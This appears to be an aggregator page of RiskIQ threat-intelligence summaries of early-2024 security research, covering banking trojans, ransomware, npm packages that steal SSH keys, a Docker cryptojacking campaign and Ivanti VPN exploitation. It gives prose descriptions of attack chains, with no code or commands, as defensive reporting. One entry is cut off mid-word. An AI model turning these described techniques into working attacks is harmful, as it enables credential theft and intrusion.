Coyote: A Multi-Stage Banking Trojan Abusing the Squirrel Installer

#### Description
A new banking Trojan named "Coyote" has been discovered, targeting users of over 60 banking institutions primarily in Brazil. It utilizes advanced techniques such as the Squirrel installer, NodeJS, and the Nim programming language to infect victims, diverging from traditional methods. The malware hides its loader within an update packager, then employs NodeJS to execute obfuscated JavaScript code and loads the final stage using Nim. Coyote persists by abusing Windows logon scripts and monitors banking applications for sensitive information, communicating with its command and control server via SSL channels.
The Trojan's complexity signifies a shift towards modern technologies among cybercriminals, reflecting an increasing sophistication in the threat landscape.

#### Reference URL(s)
1. https://securelist.com/coyote-multi-stage-banking-trojan/111846/

#### Publication Date
February 8, 2024

#### Author(s)
Global Research & Analysis Team, Kaspersky Lab

2024-02-16T19:33:28+00:00 https://community.riskiq.com/article/4643beae www.secnews.physaphae.fr/article.php?IdArticle=8451083 False Malware,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Ongoing Malicious Campaign Impacting Azure Cloud Environments

#### Description
Proofpoint researchers have been monitoring an ongoing cloud account takeover campaign impacting dozens of Microsoft Azure environments and compromising hundreds of user accounts, including senior executives. The attack integrates credential phishing and cloud account takeover (ATO) techniques. Threat actors target users with individualized phishing lures within shared documents. The varied selection of targeted roles indicates a practical strategy by threat actors, aiming to compromise accounts with various levels of access to valuable resources and responsibilities across organizational functions. Successful initial access often leads to a sequence of unauthorized post-compromise activities, including MFA manipulation, data exfiltration, internal and external phishing, financial fraud, and mailbox rules. The use of a specific Linux user-agent utilized by attackers during the access phase of the attack chain is one of the IOCs. Attackers predominantly utilize this user-agent to access the 'OfficeHome' sign-in application along with unauthorized access to additional native Microsoft 365 apps.

#### Reference URL(s)
1.
https://www.proofpoint.com/us/blog/cloud-security/community-alert-ongoing-malicious-campaign-impacting-azure-cloud-environments

#### Publication Date
February 7, 2024

#### Author(s)
Proofpoint Cloud Security Response Team

2024-02-15T19:44:52+00:00 https://community.riskiq.com/article/0e03c855 www.secnews.physaphae.fr/article.php?IdArticle=8450550 False Threat,Cloud None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Bumblebee Buzzes Back in Black | Proofpoint US

#### Description
Proofpoint researchers discovered the return of the Bumblebee malware on February 8, 2024, marking its reappearance after four months of absence from their threat data. Bumblebee, a sophisticated downloader utilized by various cybercriminal groups, resurfaced in a campaign targeting US organizations through emails with OneDrive URLs containing Word files posing as voicemail messages from "info@quarlesaa[.]com". These Word documents, impersonating the electronics company Humane, utilized macros to execute scripts and download malicious payloads from remote servers. The attack chain, notably employing VBA macro-enabled documents, contrasts with recent trends in cyber threats, where such macros were less commonly used. Despite the absence of attribution to a specific threat actor, Proofpoint warns of Bumblebee's potential as an initial access point for subsequent ransomware attacks. The resurgence of Bumblebee aligns with a broader trend of increased cybercriminal activity observed in 2024, marked by the return of several threat actors and malware strains after prolonged periods of dormancy, indicating a surge in cyber threats following a temporary decline.

#### Reference URL(s)
1.
https://www.proofpoint.com/us/blog/threat-insight/bumblebee-buzzes-back-black

#### Publication Date
February 12, 2024

#### Author(s)
Axel F, Selena Larson, Proofpoint Threat Research Team

2024-02-15T18:48:58+00:00 https://community.riskiq.com/article/ab2bde0b www.secnews.physaphae.fr/article.php?IdArticle=8450534 False Ransomware,Malware,Threat,Prediction None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

The Nine Lives of Commando Cat: Analysing a Novel Malware Campaign Targeting Docker

#### Description
Cado researchers have discovered a new malware campaign called "Commando Cat" that targets exposed Docker API endpoints. The campaign is a cryptojacking campaign that leverages Docker as an initial access vector and mounts the host's filesystem before running a series of interdependent payloads directly on the host. The payloads are delivered to exposed Docker API instances over the internet. The attacker instructs Docker to pull down a Docker image called cmd.cat/chattr. The cmd.cat project "generates Docker images on-demand with all the commands you need and simply point them by name in the docker run command." It is likely used by the attacker to seem like a benign tool and not arouse suspicion. The attacker then creates the container with a custom command to execute. The primary purpose of the user.sh payload is to create a backdoor in the system by adding an SSH key to the root account, as well as adding a user with an attacker-known password. The tshd.sh script is responsible for deploying TinyShell (tsh), an open-source Unix backdoor written in C. The gsc.sh script is responsible for deploying a backdoor called gs-netcat, a souped-up version of netcat that can punch through NAT and firewalls. The aws.sh script is a credential grabber that pulls credentials from a number of files on disk, as well as IMDS, and environment variables.
The final payload is delivered as a base64-encoded script rather than in the traditional curl-into-bash method used previously by the malware. This base64 is echoed into base64 -d, and then piped into bash.

#### Reference URL(s)
1. https://www.cadosecurity.com/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker/

#### Publication Date
February 1, 2024

#### Author(s)
Nate Bill, Matt Muir

2024-02-08T20:42:07+00:00 https://community.riskiq.com/article/1ae69360 www.secnews.physaphae.fr/article.php?IdArticle=8448153 False Malware,Tool None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

THREAT ALERT: Ivanti Connect Secure VPN Zero-Day Exploitation

#### Description
Ivanti VPN appliances have been exploited through two critical vulnerabilities, CVE-2023-46805 and CVE-2024-21887, which were not patched at the time of disclosure. These vulnerabilities allow unauthorized command execution and system access on Internet-facing security devices, compromising the integrity of secure VPN tunnels and exposing private internal networks to potential espionage and data theft. Attackers exploited these vulnerabilities to modify legitimate Ivanti Connect Secure components, backdooring the compcheckresult.cgi file to enable remote command execution and altering JavaScript files within the Web SSL VPN component to capture and exfiltrate user login credentials. The additional vulnerabilities disclosed by Ivanti on January 31st, CVE-2024-21888 and CVE-2024-21893, also allow for unauthenticated remote command execution with elevated privileges, increasing the attack surface for malicious actors. The impact of these vulnerabilities is profound, enabling attackers to bypass multi-factor authentication, steal confidential information, establish covert command and control channels, and potentially disrupt critical operations.
Attribution analysis by Mandiant indicates that these vulnerabiliti

2024-02-07T21:04:11+00:00 https://community.riskiq.com/article/903e3f3c www.secnews.physaphae.fr/article.php?IdArticle=8447805 False Vulnerability,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Ivanti Zero Day – Threat Actors observed leveraging CVE-2021-42278 and CVE-2021-42287 for quick privilege escalation to Domain Admin

#### Description
NCC Group has observed what they believe to be the attempted exploitation of CVE-2021-42278 and CVE-2021-42287 as a means of privilege escalation, following the successful compromise of an Ivanti Secure Connect VPN using the zero-day vulnerabilities CVE-2023-46805 and CVE-2024-21887.

#### Reference URL(s)
1. https://research.nccgroup.com/2024/02/05/ivanti-zero-day-threat-actors-observed-leveraging-cve-2021-42278-and-cve-2021-42287-for-quick-privilege-escalation-to-domain-admin/

#### Publication Date
February 5, 2024

#### Author(s)
David Brown, Mungomba Mulenga

2024-02-06T20:20:15+00:00 https://community.riskiq.com/article/0f5ea97b www.secnews.physaphae.fr/article.php?IdArticle=8447414 False Vulnerability,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

VajraSpy: A Patchwork of Espionage Apps

#### Description
ESET researchers have discovered a new cyber espionage campaign that uses twelve Android apps carrying VajraSpy, a remote access trojan (RAT) used by the Patchwork APT group. Six of the apps were available on Google Play, and six were found on VirusTotal. The apps were advertised as messaging tools, and one posed as a news app. VajraSpy has a range of espionage functionalities that can be expanded based on the permissions granted to the app bundled with its code.
It steals contacts, files, call logs, and SMS messages, but some of its implementations can even extract WhatsApp and Signal messages, record phone calls, and take pictures with the camera. The campaign targeted users mostly in Pakistan, and the threat actors likely used targeted honey-trap romance scams to lure their victims into installing the malware.

#### Reference URL(s)
1. https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/

#### Publication Date
February 1, 2024

#### Author(s)
Lukas Stefanko

2024-02-05T21:31:30+00:00 https://community.riskiq.com/article/b8134bfa www.secnews.physaphae.fr/article.php?IdArticle=8447349 False Malware,Tool,Threat,Mobile None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Frog4Shell - FritzFrog Botnet Adds One-Days to Its Arsenal

#### Description
The Akamai Security Intelligence Group (SIG) has uncovered details about a new variant of the FritzFrog botnet, which abuses the 2021 Log4Shell vulnerability. The malware infects internet-facing servers by brute forcing weak SSH credentials. Newer variants now read several system files on compromised hosts to detect potential targets for this attack that have a high likelihood of being vulnerable. The malware now also includes a module to exploit CVE-2021-4034, a privilege escalation in the polkit Linux component. This module enables the malware to run as root on vulnerable servers.

#### Reference URL(s)
1.
https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell

#### Publication Date
February 2, 2024

#### Author(s)
Ori David

2024-02-02T20:03:16+00:00 https://community.riskiq.com/article/1fe06690 www.secnews.physaphae.fr/article.php?IdArticle=8446120 False Malware,Vulnerability,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Trigona Ransomware Threat Actor Uses Mimic Ransomware

#### Description
AhnLab Security Intelligence Center (ASEC) has identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware. The attack targets MS-SQL servers and exploits the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process. The attacker also attempted to use malware for port forwarding to establish an RDP connection to the infected system and control it remotely. The Trigona threat actor is known to use Mimikatz to steal account credentials. The threat actor installed AnyDesk to control the infected system. Administrators must use passwords that cannot be easily guessed and change them periodically to protect the database servers from brute force and dictionary attacks. V3 must also be updated to the latest version to block malware infection in advance. Administrators should also use security programs such as firewalls for database servers accessible from outside to restrict access by external threat actors.

#### Reference URL(s)
1.
https://asec.ahnlab.com/en/61000/

#### Publication Date
January 29, 2024

#### Author(s)
Sanseo

2024-02-01T21:40:33+00:00 https://community.riskiq.com/article/f3fb7f61 www.secnews.physaphae.fr/article.php?IdArticle=8445735 False Ransomware,Malware,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

ESET Takes Part in Global Operation to Disrupt the Grandoreiro Banking Trojan

#### Description
ESET has worked with the Federal Police of Brazil on an effort to disrupt the Grandoreiro botnet, providing technical analysis, statistical information and known C&C servers to the authorities. Grandoreiro is a Latin American banking trojan that has been active since at least 2017 and targets Brazil, Mexico, and Spain. Grandoreiro's operators have abused cloud providers such as Azure and AWS to host their network infrastructure.

#### Reference URL(s)
1. https://www.welivesecurity.com/en/eset-research/eset-takes-part-global-operation-disrupt-grandoreiro-banking-trojan/

#### Publication Date
January 30, 2024

#### Author(s)
ESET Research

2024-01-31T21:23:24+00:00 https://community.riskiq.com/article/5af9ede2 www.secnews.physaphae.fr/article.php?IdArticle=8445334 False Cloud,Technical None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Kimsuky Group Uses AutoIt to Create Malware (RftRAT, Amadey)

#### Description
The Kimsuky threat group, deemed to be supported by North Korea, has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014. Cases of attacks against countries other than South Korea have also been identified since 2017.
The group usually employs spear phishing attacks against the national defense sector, defense industries, the press, the diplomatic sector, national organizations, and academic fields to steal internal information and technology from organizations. Even until recently, the Kimsuky group was still mainly employing spear phishing attacks to gain initial access. What makes the recent attacks different from the previous cases is that more LNK shortcut-type malware is being used instead of malware in Hangul Word Processor (HWP) or MS Office document format. The threat actor led users to download a compressed file through attachments or download links within spear phishing emails. When this compressed file is decompressed, it yields a legitimate document file along with a malicious LNK file.

#### Reference URL(s)
1. https://asec.ahnlab.com/en/59590/

#### Publication Date
December 7, 2023

#### Author(s)
Sanseo

2024-01-30T21:43:14+00:00 https://community.riskiq.com/article/806c1abf www.secnews.physaphae.fr/article.php?IdArticle=8444953 False Malware,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

GitGot: GitHub Leveraged by Cybercriminals to Store Stolen Data

#### Description
ReversingLabs researchers have discovered two malicious packages on the npm open source package manager that leverage GitHub to store stolen Base64-encoded SSH keys lifted from developer systems that installed the malicious npm packages. The packages, warbeast2000 and kodiak2k, were identified in January and have since been removed from npm. The warbeast2000 package was downloaded a little less than 400 times, whereas kodiak2k was downloaded around 950 times. The malicious actors behind the packages used GitHub to store the stolen information. The warbeast2000 package contained just a few components and was still under development when it was detected.
The package would launch a postinstall script that fetched and executed a JavaScript file. This second-stage malicious script read the private SSH key stored in the id_rsa file located in the /.ssh directory. It then uploaded the Base64-encoded key to an attacker-controlled GitHub repository. The kodiak2k package had more than 30 different versions and, apart from the first few, all of them were malicious. The package also executed a script found in an archived GitHub project containing the Empire post-exploitation framework. The script also invokes the Mimikatz hacking tool, which is commonly used to dump credentials from process memory.

#### Reference URL(s)
1. https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data

#### Publication Date
January 23, 2024

#### Author(s)
Lucija Valentić

2024-01-30T19:59:14+00:00 https://community.riskiq.com/article/d8ec25d3 www.secnews.physaphae.fr/article.php?IdArticle=8444918 False Tool,Threat None 4.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Mexican Banks and Cryptocurrency Platforms Targeted With AllaKore RAT

#### Description
A financially motivated threat actor has been targeting Mexican banks and cryptocurrency trading entities with a modified version of AllaKore RAT. Lures use Mexican Social Security Institute (IMSS) naming schemas and links to legitimate, benign documents during the installation process. The AllaKore RAT payload is heavily modified to allow the threat actors to send stolen banking credentials and unique authentication information back to a command-and-control (C2) server for the purposes of financial fraud.

#### Reference URL(s)
1.
https://blogs.blackberry.com/en/2024/01/mexican-banks-and-cryptocurrency-platforms-targeted-with-allakore-rat

#### Publication Date
January 29, 2024

#### Author(s)
BlackBerry Research & Intelligence Team

2024-01-29T20:40:12+00:00 https://community.riskiq.com/article/98ad6319 www.secnews.physaphae.fr/article.php?IdArticle=8444546 False Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

NSPX30: A Sophisticated AitM-Enabled Implant Evolving Since 2005

#### Description
ESET researchers uncover NSPX30, a sophisticated implant used by a new China-aligned APT group they have named Blackwood. NSPX30 is delivered through adversary-in-the-middle (AitM) attacks hijacking update requests from legitimate software. The implant was detected in targeted attacks against Chinese and Japanese companies, as well as against individuals located in the United Kingdom. NSPX30 is a multistage implant that includes several components such as a dropper, an installer, loaders, an orchestrator, and a backdoor. Both of the latter two have their own sets of plugins. The implant was designed around the attackers' capability to conduct packet interception, enabling NSPX30 operators to hide their infrastructure. NSPX30 is also capable of allowlisting itself in several Chinese antimalware solutions.

#### Reference URL(s)
1.
https://www.welivesecurity.com/en/eset-research/nspx30-sophisticated-aitm-enabled-implant-evolving-since-2005/

#### Publication Date
January 24, 2024

#### Author(s)
Facundo Muñoz

2024-01-26T18:48:27+00:00 https://community.riskiq.com/article/48faa09a www.secnews.physaphae.fr/article.php?IdArticle=8443505 False None None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Kasseika Ransomware Deploys BYOVD Attacks, Abuses PsExec and Exploits Martini Driver

#### Description
The ransomware operation named 'Kasseika' has adopted Bring Your Own Vulnerable Driver (BYOVD) tactics to disable antivirus software before encrypting files. Kasseika exploits the Martini driver, part of TG Soft's VirtIT Agent System, to disable antivirus products protecting the targeted system. Trend Micro discovered Kasseika in December 2023, noting its similarities with BlackMatter, suggesting it may have been built by former members or actors who purchased BlackMatter's code. The attack begins with a phishing email, stealing credentials for initial access, followed by the abuse of the Windows PsExec tool for lateral movement. Kasseika utilizes BYOVD attacks to gain privileges, terminate antivirus processes, and execute its ransomware binary, demanding a Bitcoin ransom and providing victims with a decryption option within 120 hours.

#### Reference URL(s)
1. https://www.trendmicro.com/en_us/research/24/a/kasseika-ransomware-deploys-byovd-attacks-abuses-psexec-and-expl.html

#### Publication Date
January 25, 2024

#### Author(s)
TrendMicro Researchers

2024-01-25T20:18:28+00:00 https://community.riskiq.com/article/86b5ec3e www.secnews.physaphae.fr/article.php?IdArticle=8443135 False Ransomware,Tool,Prediction None 3.0000000000000000